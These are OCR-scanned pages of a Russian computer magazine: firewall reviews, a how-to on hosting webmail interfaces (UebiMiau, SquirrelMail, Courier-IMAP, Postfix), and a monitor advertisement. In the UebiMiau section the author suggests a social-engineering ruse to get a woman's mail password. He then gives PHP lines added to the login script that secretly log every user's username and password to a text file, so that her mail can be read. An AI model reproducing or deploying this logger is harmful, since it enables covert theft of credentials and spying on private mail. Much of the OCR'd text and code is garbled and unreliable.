сов как на ладони. Еще один клик - и ты 
сможешь вручную откорректировать диапа- 
зон ІР-адресов, маску подсети, шлюзы и т.п. 
Каждую из имеющихся сетей можно обозна- 
чить как безопасную (ТгизТесІ) зону, а также 
настроить использование ЫеШІОЗ'а. 

Ну вот, все правила прописаны, порты зак- 
рыты, система работает как часы. Что теперь? 
Успокоиться и с чувством выполненного долга 
отправиться на любимый порнушный сайт? 
Как бы не так! Рано еще, рано! На порноре- 
сурсах, как известно, куча рекламы. Зачем же 
засорять ею свой канал? ОфозТ предлагает 
два гениальных метода защиты от рекламы: 
по ключевым словам и по размеру изображе- 
ния. Вместе они составляют убийственную 
для рекламы связку, позволяющую блокиро- 
вать практически любой баннер. Примеча- 
тельно то, что настраивать ничего и не надо, 
т.к. стандартные настройки уже включают в 
себя списки ключевых слов и наиболее расп- 



ространенных размеров баннеров. При этом 
назойливую рекламу можно заменить либо 
текстовой строкой, либо прозрачной плашкой. 
Разработчики рекомендуют выбирать первый 
вариант, т.к. второй не гарантирует стопроце- 
нтного успеха. Мне, однако, эти доводы пока- 
зались недостаточными, поэтому я сделал в 
точности наоборот и выбрал замену прозрач- 
ными изображениями. И, знаешь ли, немного 
об этом пожалел. Появилась одна неприятная 
штука, связанная с тем, что ОфозТ режет 
исключительно сами изображения. «Ну и 
что?» - спросишь ты. А то, что ссылки при 
этом остаются целыми, и, следовательно, вся 
страница превращается в минное поле. 

Ткнешь в пустоту, и браузер перенаправит те- 
бя по новому линку. Мелочь, конечно, но не 
особо приятно. Правда, стоит отметить и тот 
факт, что правила по резке изображений для 
определенных сайтов можно отключить. Это 
может особенно пригодиться во время посе- 
щения разного рода галерей, где активно ис- 
пользуются ЛіитЬпаіГы (предварительный 
просмотр в виде таблицы с уменьшенными 
изображениями). Зачастую случается, что раз- 
меры превьюшек попадают под критерий 
«баннер» и беспощадно вырезаются. Так на- 
зываемый белый список поможет эти ситуа- 
ции избежать. 

Но, пожалуй, главной отличительной чер- 
той этого файрвола является открытость ар- 
хитектуры, за счет которой стало возможно 
создавать и подключать различные плагины. 
В стандартный набор уже входят несколько 
полезных добавок, которые пригодятся тебе 
в повседневной жизни: детектор атак, защи- 
та файлов, блокировка содержимого стра- 
ниц, кэширование ОЫЗ, блокировка рекламы 
(о которой я уже рассказал) и блокировка ак- 
тивного содержимого. 

Последняя является, пожалуй, наиболее 
аппетитной. Впечатляет сам список контро- 
лируемого содержания: ^ и ѴВ скрипты, 
компоненты АсТіѵеХ, всплывающие окна и 
т.п. Лично меня особенно порадовала воз- 
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Неприхотливый дизайн Казрегзку Апіі-Наскег'а 



можность обрезать РІазМ'евые ролики. Ей- 
богу, ждать, пока на крупном сайте загрузят- 
ся 2-3 флешевых баннера, меня откровенно 
достало. Долгое время в этих же целях я 
юзал специальные софтины и фильтры. Те- 
перь же такая необходимость отпала. При- 
мечателен и тот факт, что правила блокиров- 
ки можно настроить как для вебсерфинга, 
так и для е-таіі корреспонденции. И если 
кто-то думает, что это не особо актуально, 
то он глубоко заблуждается. Новомодные е- 
таіі клиенты, типа многострадального 
(МІоок Ехргезз'а, позволяют вставлять в те- 
ло письма опасные компоненты. 

Кроме того, Оиірозі поддерживает так на- 
зываемый «зІеаШѵрежим» и имеет сложный 
пакетофильтрующий алгоритм, позволяю- 
щий предотвратить наиболее популярные 
виды ЭоЗ-атак. 

Вердикт: первоклассный файрвол, име- 
ющий в своем распоряжении несколько до- 
полнительных и, что немаловажно, полно- 
ценных утилит. Ведет подробные логи, прос- 
мотр которых осуществляется при помощи 
мощного Іод-ѵіеѵѵег'а. 



Экспонат: Казрегзку Апіі-Наскег 1.5.119 



Размер: 10 Мб (ЗирегХХЦ 



Тип: Зііагеѵѵаге 



Хомяк: ѵм.казрегзку.сот 

Возможно, кто-то подумает, что эта прог- 
рамма является черным РРГом по отношению 
к нашему журналу :). Но это не так! Ее разра- 
ботчики к X никаких претензий не имеют, зато 
против хакеров они настроены весьма серьез- 
но. И объясняется это тем, что Казрегзку АпТі- 
Наскег является чрезвычайно качественной 
реализацией классического файрвола. 

Как и любая другая программа этого пла- 
на, АпТі-Наскег успешно отслеживает сете- 
вую активность по протоколу ТСР/ІР для лю- 
бых приложений твоего компьютера. Нес- 
колько удивляет, что период обучения и 
настройка правил файрвола практически 
идентичны аналогам из предыдущего бранд- 
мауэра. Совсем как два брата-близнеца, 
честное слово. Но это даже к лучшему. 

При обнаружении приложения, не пропи- 
санного в правилах, Апй-Наскег немедленно 
проинформирует об этом пользователя. 
Причем файрвол попробует самостоятельно 
найти в своей базе подходящее правило и в 
случае успеха будет рекомендовать его при- 
менение. В противном случае его придется 
создавать самостоятельно или выбрать из 
уже имеющихся правил. Атак как все прави- 
ла четко разделены по назначению описыва- 
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емых ими 
программ, то 
ориентиро- 
ваться среди них крайне просто. Мало того, 
настроить правила в Апй-Наскег'е ты смо- 
жешь еще и на низком уровне. Так что нас- 
тоятельно рекомендую заглянуть в раздел 
«Правила фильтрации пакетов». Важно лишь 
запомнить, что приоритет последних выше, 
чем у правил для приложений. 

Поддерживает Апй-Наскег и режим неви- 
димости, который затрудняет обнаружение 
твоего компьютера извне. В этом режиме 
разрешена сетевая активность, которую ини- 
циирует лишь сам пользователь. Поэтому 
сканирование портов и ріпд твоей машины 
снаружи запрещены. По сути, ты становишь- 
ся невидимым, т.к. игнорируешь любые 
ІСМР-запросы, вследствие чего практически 
исключаешь возможность пострадать от 
йоЗ-атаки. 

Немаловажно и то, что Апй-Наскег отсле- 
живает любые попытки сканирования портов 
твоей машины. Причем для пущей сохран- 
ности машины он поддерживает автомати- 
ческое занесение координат неприятеля в 
черный список. Полезная функция, особенно 
если учитывать, что просто так здоровый че- 
ловек порты сканировать не станет. 

Не могу не упомянуть и встроенные ути- 
литы для просмотра списка установленных 
соединений, активных сетевых приложений 
и открытых портов. Казалось бы, что в них 
особенного? Но нет, есть изюминка! Каждая 
из них позволяет моментально обрубить не- 



-- 






нужное соединение и на месте создать соот- 
ветствующее правило. Необходимость сер- 
фить специфические настройки программы 
в этом случае попросту отпадает. Другим 
программам эта элементарная, но невероят- 
но удобная фишка и не снилась. 

Вердикт: если тебе нужна стопроцентная 
защита без лишних наворотов, то Казрегзку 
Апй-Наскег - это именно то, что доктор про- 
писал. А баннеры можно резать и другими 
тулзами! ;) 

А ДЕРЗПЙ! 

Напоследок напомню, что вышеописанные 
файрволы выбирались не абы как. Они отно- 
сятся к профессиональному и полнофункци- 
ональному классу. А это значит, что любой 
из них может предоставить тебе неплохой 
уровень защиты. Да, у некоторых из них есть 
небольшие минусы. Но зацикливаться на них 
не стоит. Ведь этот самый ма- 
ленький минус может обернуть- 
ся двумя плюсами в плане бе- 
зопасности. 
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поха, гайз! Сейчас стало модно иметь свой хостинг и в придачу домен второго уровня с красивым именем вроде №іш.ра(Іопак.пі 
Скорее всего, ты тоже располагаешь таким чудом и можешь на нем создавать кучу почтовых ящиков вида патеіраіІопак.гл. Ну как 
не удержаться и не понтануться перед своей (или не своей) теткой, подарив ей такое красивое мыло? Разумеетсн, это просто 
необходимо! Но! Ты только представь, сколько сразу появитсн геморрои, когда ты начнешь этой тетке обьнсннть, как настроить Оутгпюк 
или Бат, чтобы снять почту с твоего сервера. Да и самому-то охота будет качать Бат и настраивать его, чтобы проверить почту, когда ты 
волею судеб будешь находиться в деревне Ниндюкино, где отсасывает чупа-чупс СРН8, а модем не разгоняется выше 2400? Сейчас я 
расскажу о том, как можно решить эти многочисленные проблемы, подняв у себя на хосте веб-интерфейс. 



ПОЧТОВЫЙ ВЕБ-ИНТЕРФЕЙС СВОИМИ Р9КПМИ 



ДЕШЕВО 
КДЧЕСТВЕННО 



гарантия 



.ІІІЕВІМІПІІ2.7 



Поддерживаемые ОСи: Ыпих, ѴѴіпсІоѵѵз. 
С чем работает: 1МАР/Р0РЗ, 8МТР. 
Официальный сайт: міоеЬітіаи.огд. 




Я меет: принимать и отправлять 
почту (а иначе на фига он нужен 
бы был? - прим, ред.), созда- 
вать записи в адресной книге, 
устанавливать собственные кво- 
ты на размер ящика. Поддержи- 
вает шкурки. 

Очень удобный и простой в 
настройке клиент. Не знаю, почему я выбрал 
его первым. Наверное, название понрави- 
лось :). Первая часть слова и козе понятна, а 
вот вторая до сих пор остается для меня за- 
гадкой. Скорее всего, это что-то связанное с 
кошкой. Видимо, авторы не очень любят 
этих милых животных и решили назвать свое 
детище «УдарьКошку». 

Итак, качаем клиент с официального сай- 
та, распаковываем его и заливаем все фай- 
лики и папочки из архива на свой мегакру- 
той сервак. К примеру, в папку ѵѵеЬтаіІ, 
предварительно создав ее, разумеется :). 
Залив всю эту байду, заходим в ѵѵеЬтаіІ/іпс. 
Здесь нам нужно открыть файлик сопТід.рИр 
в режиме редактирования. Обратим внимание 
на переменную $Іетрогагу_с1ігесІогу. Она 
указывает, в какое место будут складываться 
все временные файлы, создаваемые нашим 
веб- интерфейсом на сервере. Лучше опреде- 
лить директорию, которая не будет видна че- 
рез апач, потому что на эту папку необходимы 



полномочия типа «геасі-ѵѵпіе». Давай, напри- 
мер, запихнем все это барахло в папку Дтр. В 
*піх-системах такая дира уже есть, а в виндах 
придется создать самим (пусть будет с:\Ітр, 
ок?). Создав темповую папку, присваиваем 
переменной $1:ет рогагу сі ігесіогу значение 
«Дтр». Смотрим дальше. 

Видим вариаблу $зт1р_зегѵег. Здесь пе- 
ред нами встает выбор: можно использовать 
свой (или чужой) ЗМТР-сервер, а можно 
отсылать почту через наш зепсітаіі. 

Сендмейл можно использовать, если хос- 
тинг поднят под юниксовой системой. 

Так что если твой сервер в доску свой, 
то можешь позаморачиваться с настройками 
сендмыла и т.д. Но давай не будем забивать 
остатки мозгов всякой чепухой и просто ука- 
жем нужный нам ЗМТР-сервер, присвоив пере- 
менной $зт1р_зегѵег его имя. Например, 
$тір.расІопак.ги. Но если тебе все же приспичило 
использовать сенд- 
майл, то делаем так: 

$зт1р_зегѵег = ІосаІ- 
Ьозі, после чего ищем 
где-то внизу конфига 
переменную 
$изе_зепс1таіІ и 
ставим ей значение 
уез. Но этого недоста- 
точно, поэтому даль- 
ше следует указать 
путь к сендмайлу, 
присвоив переменной 
$ра№_Іо_зепс1таіІ 
значение 
/изг/зЬіп/зепсІтаіІ. 



Приступаем к дальнейшей настройке на- 
шего клиента. Ищем переменные 
$таіІ_ргоіосоІ и $таіІ_рогі Тут предсто- 
ит выбрать, что использовать: РОРЗ или 
ІМАР. А также надо указать порт. Выбор ста- 
новится очевидным после прочтения в ком- 
ментах строчки «ТМе ітар із тоге Тазі, Ьиі аІІ 
Іипсйопз оі ІІеЬіМіаи ѵѵогкз ѵѵіШ РОРЗ», что 
переводится как «Имап быстрее, но все 
функции ІІеЬіМіаи работают с ПОПЗ». Сле- 
довательно, ставим $таіІ_ргоІосоІ = рорЗ, а 
порт выставляем стандартный, приравняв 
значение $таМ рогТ к 1 10. 

Чтобы в клиенте правильно отображалось 
время, необходимо установить часовой пояс 
в соответствии с регионом, в котором ты 
живешь. Если ты столичный житель, то уста- 
навливай $зегѵег_1іте_20пе = +0300. 

Далее устанавливаем размер ящика в ки- 
лобайтах. Если он будет, к примеру, 1 0 ме- 
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габайт, то 1 0 умножаем на 1 024 и получаем 
нужное число. Осталось передать это число 
переменной $диоІа_Іітіі 
Вариабла $и5ѳ_раз5ѵѵогсМог_зтІр от- 
вечает за то, использовать ли пароль при 
коннекте на смтп или все-таки ну его на ][ :). 
Для некоторых серверов это необходимо, но 
в моем случае $изе раззѵѵогсі _*ог_зт*р выс- 
тавлен в «по». 

$сНеск_Тігзі_Іодіп - эта переменная пре- 
допределяет, будет ли юзера, впервые про- 
веряющего почту, редиректить на страницу 
личных настроек, где он сможет указать свои 
личные данные, внешний вид окна почтового 
клиента, интервал проверки новой почты и 
т.д. Присваиваем этой переменной «уез» или 
«по» на свое усмотрение. 

Переменная $таіІ_зегѵег_Іуре может 
принимать три значения: ОЕТЕСТ, ОМЕ-РОВ- 
ЕАСН и ОМЕ-РОВ-АИ. Самый рульный тип - 
это ОМЕ-РОВ-ЕАСН. Юзая его, можно устано- 
вить туеву хучу доменов и выставить для 
каждого из них свой рорЗ-сервер :). И потом, 
зайдя на наш веб-интерфейс, можно будет 
проверять почту с нескольких серверов. 

Следовательно, $таіІ зегѵег іуре = “ОМЕ- 
РОВ-ЕАСН”. Если мы выбираем этот тип, то 
переменные $таіІ_сІе*ес*_гетоѵе, 
$таіІ_сІе*ес*_рге*іх и $таіІ_сІе*есУодіп_*уре 
можно пропустить, т.к. они относятся к типу 
ОЕТЕСТ. Дальше идет то, что нам нужно: 

$таіІ_$егѵег$[] = Аггау( 

"сіотаіп" => "расіопак.ги", 

"зегѵег" => "таіі.расіопак.ги", 

"Іодіп_іуре" => " %и $е г%@%(1 о т а і п % " 

); 

$таіІ_$егѵег$[] = Аггау( 

"сіотаіп" => "таіі.ги", 

"$егѵег" => "рор.таіі.ги", 

"Іодіп_іуре" => "%и$ег%" 

): 

Здесь стоит обратить внимание на 
Іодіп іуре. Некоторые серверы в качестве 
юзернейма используют полный адрес мыла. 
Например, чтобы снять почту с расіопак.ги, 
нужно в поле логина указывать 
пате@расІопак.ги. Тогда Іодіп іуре необхо- 
димо прописать следующим образом: 
%изег%@%сІотаіп%. Если же в качестве 
имени пользователя используется все, что 
идет до собаки, то в Іодіп іуре заносим 
просто %изег%, и все. 

Я указал падонковский и мейлрушный 
серваки - пусть тетки через мой веб-интер- 
фейс снимают почту еще и с мыла.ру. Спро- 
сите, на фига оно мне упало? Мол, зачем 
еще трафик лишний мотать? Хе, расскажу 
чуть ниже, когда веб-интерфейс будет пол- 
ностью настроен :). 

Дальше идут переменные для типа ОМЕ- 
РОВ-АІ_І_, их тоже можно не трогать 
($сІеТаиІ1: таіІ_зегѵег, $опе Тог аІІ Іодіп іуре) . 



Едем дальше. Ага, настройки языка и те- 
мок! ЗаІІоѵѵ изег сИапде ІИете - давать 
или не давать юзверю право менять шкурку 
(уез, по). 

$бе*аиІ*_Шете - шкурка по умолчанию 
(отсчет с нуля). 

$аІІоѵѵ_изег_сИапде_Іапдиаде - разре- 
шать/запрещать изменять язык интерфейса. 
Оставим «уез», может, кому-нибудь и нра- 
вится читать по-немецки. Хайдук, блин :). 

$с1еІаиІІ_Іапдиаде - язык по дефолту. 
Русский - шестнадцатый :). Дальше в конфиге 
ничего интересного не наблюдается, так что 
мотаем его ниже. До переменной 
$тіте_зИоѵѵ_ИІтІ. Давай поставим «уез», 
что ли ;). Вариаблы $аррѵегзіоп и $арр- 
пате будут видны в хедере письма как X- 
таііег. Можно указать что угодно, например, 
$аррпате присвоим «КеѵѵІ ЗегѵаЫ ЬООЫік із 
ѵегу зеху диу. Зо N30 із, Ьи* по* зо ІіагсІ...», а 
переменной $аррѵегзіоп зададим значение 
500 :). 

В переменную $ТооІег тоже можно за- 
пихать все, что захочется. Текст из нее бу- 
дет добавляться в конец отправленного 
письма (реклама :)), но можно это поле 
оставить и пустым. 

Переходим к переменной 
$епаЫе_сІеЬид. Если где-то в работе на- 
шего мыл-сервера вклинился какой-то ко- 
сяк, что-то не получается, то пробуем сде- 
лать $епаЫе_сІеЬид = «уез» и отловить ба- 
ги. 

Но если все в порядке, то оставляем 
$епаЫе_сІеЬид в положении «по». 

$Ыоск_ехІегпаІ_ітадез - заблокиро- 
вать или разрешить показ картинок в письме 
с других серверов. 

$ісІІе_ІітеоиІ - интервал времени, через 
который закрывается сессия, если юзверь не 
подает признаков жизни. 

Остальные настройки трогать не обяза- 
тельно, т.к. они касаются установок самих 
юзеров. Пусть ленивые пользователи сами 
настраиваются, как хотят, в соответствую- 
щей панельке. 

А теперь что касается таіі.ги :). Тебе никог- 
да не хотелось посмотреть, какие перцы пи- 
шут твоей тетке и, самое главное, ЧТО пи- 
шут? Ясен -красен, что для воплощения меч- 
ты в жизнь необходимо знать паролик. Пер- 
вый способ его узнать - спросить ;). Напри- 
мер: «Ленусь, слушай, у тебя принтер не ра- 
ботает из-за переполнения буфера в БИОС 
после ДДОС-атаки злых хакеров на твой 
ІІЗВ-порт. Скажи свой пароль от почты - тог- 
да починим». Ну а если твоя пассия не сов- 
сем набитая ду... поролоном девушка, то вот 
второй вариант: создаем в нашей директо- 
рии на серваке файл разз.М и делаем его 
доступным для записи. Затем открываем 
файлик тздІозТрІір и где-нибудь в конце, 
перед знаком «?>», пишем следующее: 




$ір=іореп("ра$$.іхі","а"); 
іілігііе($ір,"$і_и$ег : 
$*_ра$$\п"): 
ісІо$е($ір); 

Логинчики и па- 
рольчики будут ак- 
куратно складывать- 
ся в файл разз.М в 
виде Іодіп:разз. 



ШЕВИОИ. ДЕШЕВО. КОЧЕСТВЕННО. ГОРОНТИЯ 

Л 30ШВВЕІНЯІИ.4.3Я 

Поддерживаемая ОС: Ьіпих. 

С нем работает: ІМАР, ЗМТР, 

Сливаем здесь: ѵѵѵѵѵѵ.$диіггеІтаіІ.огд/(1оѵѵпІоай.рПр. 

Умеет: принимать/отправлять письма, ма- 
нипулировать папками, устанавливать шкур- 
ки. Поддерживает вложение файлов. 

Эта штука под названием «БелкаПочта» из 
разряда тяжелой артиллерии, как и Хорда 
(мш.Ме.огд). Она не хуже, чем нынешние 
интерфейсы у таіі.ги, ІіоітаіІ.ги и т.д. 

Итак, если у тебя в локалке есть сервак на 
линухе и ты хочешь (или тебе поставили пи- 
во) замутить своим юзверям почту, то Бел- 
каПочта (что-то меня на зверей потянуло: 
кошки, белки... Люди, это не опасно?) - то, 
что доктор прописал! 

Для того чтобы поднять этот веб- интер- 
фейс, нам необходимы следующие вещи: 

О. ІМАР4геѵ1 Зегѵег. Такие, как иѵѵ-ітар, 
соигіег-ітар, сутз-ітар, [ШаіІЗегѵег], Віпс ІМАР. 

О. РозТТіх. 

Ѳ. АрасМе + РНР4 (рМр4.2 минимум). 

Можно, конечно, еще присобачить к этой 
связке туЗОЦ чтобы пользователи и почта 
хранились в базе, но лень нам не позволяет :). 

Ну-с, начнем-с. Как настроить апач, на- 
верное, всем давно известно, и даже прак- 
тически у всех он стоит. С РНР тоже особых 
трудностей возникнуть не должно. Либо 
подключаем РНР модулем в МТІрсІ.сопТ: 

ЫМосШе рІір4_тосІиІе тосІиІе$/ІіЬрІір4.$о 

АсІсІТуре аррІісаііоп/х-ШргІ-рІір .ріір 

Оігесіогуіпсіех іп(Іех.рІір 

Либо отдельным интерпретатором. Тогда 
в ІійрсІ.соп* нужно добавить следующее: 

ЗсгіріАІіаз /р!ір4/ "/и$г/Ьіп/р!ір" 

Асііоп аррІісаііопШр(І-рІір4 м /рІір4/рІір 

АсІсІТуре аррІісаііоп/х-ІііірсІ-рІір4 .ріір .ріііті ,р!ір4. ріііт .ІіітІ .Іііт .ріір 

И еще, в апаче нужно будет внести одно 
изменение: 

Оігесіогуіпсіех іпсіех.іііті іпсІех.Щт іпсіех.ріір 

Все, апач-конфигурация завершена. Даль- 
ше выбираем ІМАР-сервер. Я, оценив техни- 
ческие характеристики, остановился на 
соигіег-ітар. Тянем и устанавливаем курье- 
ра. Самый простой способ - это всеми лю- 
бимый ВРМ. 

Зіл/деі Іііір://соигіег-тіа.огд/1)еіа/соигіег/соигіег- 

0.45.6.200406ШагМ 

Можно поставить его из грт, а можно и 
компильнуть ;). 

Нужны будут библиотеки ореппззі и сугиз- 
зазі. У меня в дистрибутиве Ресіоге Соге 1 
они оказались на диске, и я их поставил из 
грт'ок. Итак, чтобы собрать курьера в грт, 
необходимо настрочить следующее: 

йгрт -іа соигіег-0.45.6.20040618.іаг.Ь22 

или, если рпм новый, как в ВесІНаШ или 
Ресіоге Соге 1 , то: 

йгртЬиіІсІ -іа соигіег-0.45.6.20040618.іаг.Ь22 
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л На нашем диске 
ты найдешь все пе- 
речисленные в 
статье клиенты для 
установки почтово- 
го веб-интерфей- 
са, а также файл с 
примером настро- 
ек ЗдиіггеІМаіІ. 




л Большинство 



юзеров и знать не 
знают о существо- 
вании каких-то там 
$МТР,РОРЗ и т.д. 
Поэтому и не могут 
нормально настро- 
ить почтовик. 
Именно для них и 
были придуманы 
веб-интерфейсы :). 
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Если же ты смелый, ловкий, умелый... 
Нет, джунгли тебя не зовут. Зато это делает 
компиляция - ждет тебя, не дождется. Сна- 
чала разархивируем: 



Переходим в /еІс/іпіГсІ/ и командуем: 

#сІіто(] до+х рорЗсІ 
йсіітосі до+х ітарсі 

Запускаем ітарсі: 

Шс/іпіУ/ітарсІ $іагі 

Проверяем при помощи Меізіаі'а, открыл- 
ся ли 143 порт: 

#пеі$іаі -ап 

Должно появиться что-то вроде <4ср О О 
0.0.0.0:143 0.0.0.0:* иЗТВІ». Ну и для завер- 
шения проверки телнетимся на наш сервак: 

ійеіпеі ІосаМ 143 



Нам предложат ответить на вопросы, ну а 
мы ответим, не обломимся. 



Правильные ответы на вопросы :) 



іп$іаІІ_гооі: [/] 

іешрсііг: [/и$г/$гс/і$ртаіІ/ро$№х-2.0.16] Дтр 
сопіуігесіогу: [/еіс/розіііх] 
сіаетогпіігесіогу: [/и$г/МЬехес/ро$№х] 
соттапсМігесіогу: [/и$г/$Ьіп] 

диеие_(1ігесІогу: [/ѵаг/$рооІ/ро$Шх] 
$еп(ІтаіІ_раіІі: [/и$г/$Ьіп/$еп(1таіІ] 
пеѵѵаІіа$е$_раІІі: [/и$г/Ьіп/пеѵѵаІіа$е$] 
таіІч_раіІі: [/и$г/Ьіп/таіІд] 
таіІ_оѵѵпег: [ро$іііх] 

$еІді(1_дгоир: [розМгор] 
тапраде_(1ігесіогу: [/и$г/ІосаІ/тап] 
затрНігесіогу: [/еІс/таіІ/$атрІе] 
геа(1те_(1ігесіогу: [по] 



$іаг -іхѵТ соигіег-0.45.6.20040618.іаг.Ь22 

Далее заходим в получившуюся диру: 

$ссІ соигіег-ішар-3.0.5.20040618 

и делаем ./сопТідиге 

В случае облома и вежливой просьбы 
системы воспользоваться грт-инсталлято- 
ром (такое может случиться, если у тебя 
стоит красная шляпа или Федора) не пугай- 
ся. Просто набери: 

./сопТідиге --ѵѵііітгесіііаі -епаЫе-ипісо(1е 

-епаЫе-ипісосІе (для корректного отображения писем в Бел- 

каПочте) 

Когда скрипт завершит свою гнусную ра- 
боту, продолжим: 

Зшаке 

Опять комп начинает трещать и хрустеть. 
Но не дадим ему пощады: 

$шаке сбеск 



Должны получить примерно вот что: 

Тгуіпд 127.0.0.1... 

Соппесіеб іо ІосаІІМ 
Е$саре сТіагасТег і$ Т 

* ОК [САРАВІЫТУ ІМАР4геѵ1 Ш0РШЗ СНІІШ ШЕЗРАСЕ 
ТНІШ=(ШЕІШІМСТ ТНКЕАО=ВЕРЕВЕМСЕЗ 50ВТ ОбОТА ШЕЕ 
АСЕ АС12=Ш(М 5ТАВТТЕЗ] Соигіег-ІМАР геасіу. Соругідііі 1998-2004 
ОоиЫе Ргесі$іоп, Іпс. Зее С0РУШ6 Тог (МгіЬиііоп іпТогшаТіоп. 

Это значит, что все в порядке, дружище! 
Глядим в файл /изг/ІіЬ/соигіег-ітар/еТс/ітарсІ 
и убеждаемся, что МАІЮІРРАТН=МаіІсІіг. 

Теперь делаем так, чтобы при добавлении 
нового юзера ему не давался доступ на ЗЗН 
и чтобы автоматом создавалась Маіісііг в его 
домашней директории. Редактируем файл 
/еТс/зкеІ/.Ьазіігс: вытираем там все и пишем 
«ехіТ;». Тупо, но работает :). 

Дальше переходим в дистрибутив курьера: 

#С(1 соигіег-ішар-3.0.5.20040618 

и делаем так: 

ТТ./таіШігтаке /еТс/$кеІ/МаіІс!іг 



Установка завершена. Про конфигурацию 
постфикса можно написать целую книгу, и в 
Сети не составит труда нарыть кучу нужной 
документации, так что углубляться особо не 
будем, а исправим только самые необходи- 
мые для работы строчки. Редактируем файл 
/еІс/розЙіх/таіп.сГ Там нас интересуют сле- 
дующие строки: 

шуогідіп 

шусЫіпаііоп 

тупеішйз 

Ставим туда значения, характерные для 
работы нашей сети. Потом проверяем, не 
накосячили ли мы: 

Лро$іііх сііеск 

Если все ок, то ничего плохого постфикс 
нам не сообщит. Да, и не забудь в конфигах 
□N3 поставить МХ-запись, что-то вроде это- 
го: 

; МХ КесогсІ 

Ш МХ 10 шаіі.сіотаіп.огд. 



Далее переключаемся в гооГа: 

$$и- 

Теперь пишем: 

Ишаке іп$іаІІ 

выходим с рута (сігі+сі) и ваяем в консоли: 

Зшаке іп$іаІГсопіідиге 

Здесь придется немножко подождать, 
бегло читая лабуду на экране. Главное, что- 
бы пиво не закончилось. Просто без пива 
никакую настройку до конца довести невоз- 
можно - проверено ;). Итак, снова рутимся и 
приступаем к настройкам: 

$$и- 

Копируем файлы ітарсі. гс и рорЗсІ.гс, на- 
ходящиеся в папке соигіег- 
ітарЗ. 0.5. 2004061 8, в /еіс/іпіі.сі/ 

Иср ітарсі.гс /еіс/іпіі.б/ітарсі 

Иср рорЗсІ.гс /еіс/іпіУ/рорЗсІ 



Добавим тестового юзера: 

йаббизег іе$і 
#ра$$н(1 іе$і 

Зайдем в каталог /Еюте/іезі и проверим. 
Если все на месте, то с чувством выполнен- 
ного долга сваливаем из чужой папки. 

Приступаем к РозЙіх. Имхо, в любом 
дистрибутиве есть постфикс. Для упрощения 
можем поставить его из грт: 

Лгрт -іѵіі розІТіх.версия.грт 

или же тянем с іір.ореппеі.ги/риЬ/ро$Шх/оііі- 
сіаІ/ро$іііх- 2 . 0 . 20 .іаг.д 2 исходники и начинаем 
погружаться в матрицу :). 

Зіаг - 2 хѵі ро$іііх- 2 . 0 . 20 .іаг.д 2 

$сб ро$іііх-2.0.20 

Зшаке -і Макеіііе.іпіі шакеЛІез 

Зшаке 

$$и- 

йаУизег розіііх 
ЛдгоираМ ро$Мгор 
Ишаке іпзіаіі 



Теперь приступим к самой БелкоПочте. 
Скачиваем грт, или згрт, или Іаг.д г - это 
неважно, там все равно находится архив пэ- 
хэпэшных файлов, которые в конце концов 
нужно будет скопировать в папку, указанную 
в Ооситепігооі файла ІійрсІ.сопІ. По умол- 
чанию это /ѵаг/ѵѵѵш/МтІ. 

Я поставил БелкоПочту из грт'ки: 

йгрт -іѵіі $диіггеІтаіГ1.4.3а-1.поагс1і.грт 

Настройка очень проста: переходим в ка- 
талог, куда положили веб-интерфейс, потом 
в папке сопТід редактируем файл сопТід.рГір. 

Редактируй его аналогично тому, как я 
настраивал ІІеЬіМіаи. Там все абсолютно так 
же. Но если тебе все-таки что-то будет не- 
понятно, то на диске ты сможешь найти 
текстовик с примером моих настроек. 

А КОНЕЦ -ДЕПП ВЕНЕЦ 

Дальше просто заходим браузером на 
Шр://твой_домен/папка_белкапонты и начинаем ба- 
ловаться. Ты, в общем, балуйся дальше, а я 
пойду все-таки к врачу схожу. Не нравятся 
мне эти зоологические наклонности с белка- 
ми и кошками... X 
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Работайте с лучшими! 

Оистрибьтор Рашей Мечты! 




ѳгРІ-АТГЮМ зегіѳз 




ВгідМѴіе ѵѵ 

функция включает 4 режима: 

“текст”, “фото”, “кино” и “стандартный”. 

Каждый обладает уникальными параметрами настройки 
контрастности и цветовой температуры 



БВ 



ВгідЫѴѴіпсІоіл/ 

функция позволяет выборочно регулировать яркость. 
Область оптимальной яркости можно создать, просто 
выделив область мышью, а также свободно 
передвигать и изменять размеры этой области. 







егПАТКОМ Т710 РНІРѴ 

Диагональ - 17” 

Тип трубки - еіРІ-АТ 
Разрешение -1 280x1 024@75 Гц 
Точка - 0,25/0,20 мм 

Г оризонтальная частота - 30-85 КГ ц 
Соответствие стандартам - ТСО’ОЗ 





АіМіс зегіѳз 



ЫдМѴіеш 

функция включает 3 режима: 

“день”, “ночь”, и “пользовательский”. 

В режимах “день” и “ночь” есть режимы: 

“текст”, “фото” и “кино”. 

Каждый из этих 6 режимов обладает 
уникальными параметрами настройки 
контрастности и яркости. 

Мониторы серии А г Т і $ Т і с 
являются призерами международных конкурсов 
индустриального дизайна: ІР Резі^п 2003 и Кесісіот 







гесісіоі сіезідп аѵѵагсі 

ѵѵіппег 2003 



мЯ- НЕТ 






р=ьатг?ом изз 



ІСО РІ-АТКСШ И 520/и 720 

Диагональ - 15717” 

Тип экрана - І_С0 
Разрешение -1280x1024 
Углы обзора -Н: 160, V: 140 
Контрастность - 400:1 
Яркость - 300 ссІ/т2 
Соответствие стандартам - ТСО’99 




ИЗ 0ѵТ Е И В 



л Компания РѴМ Огоир: 
тел.: (095) 777-10-44 

ОѴІѴІ Ф акс: (095) 958-60-19 
□ кои" ѵѵ ѵѵ ѵѵ . сі ѵ т . г и 



Приглашаем к сотрудничеству партнеров 
Специальные условия для корпоративных клиентов 



Москва (095): Бит и Байт 788-00-46; Дестен Компьютере 785-10-80; Дилайн 969-2222; Инфорсер 173-99-34; ИНЛАЙН 941-6161; Кибертроника 504-25-31; Компус графике 937-3249; 
Техносила 777-87-77; Технофорум 506-79-48; Онлайн Трейд 737-47-48; Миган Про 900-73-09; НИКС 974-33-33; ОЮІ 232-30-09; Систек 781 -23-84; Слай Компьютере 974-6671; 
Цифровой мир 785-38-88; АМ 158-63-62; ІІ5М Сотриіегз 775-82-02; Норма Элит ТД 330-27-74; НТ компьютере 917-19-30; Остров Формоза 926-24-52; Компания МЕІЛЫ 727-1222; 
Формоза-Альтаир 728-40-04; Эльдорадо 500-0000; Е-Ноизе 742-5657; Рогит Сотриіегз 775-7559; Ргопеі 789-3846; 8ТІМ 783-5880; ІЛ.ТВА Сотриіегз 775-7566; 

ІР Сотриіегз 961 -0009; Александров (09244): Компьютер Лайн 65-2-65 Архангельск (81836): Фаворит 6-10-11 Белгород (0722): Инфотех 26-36-18, Благовещенск (4162): 
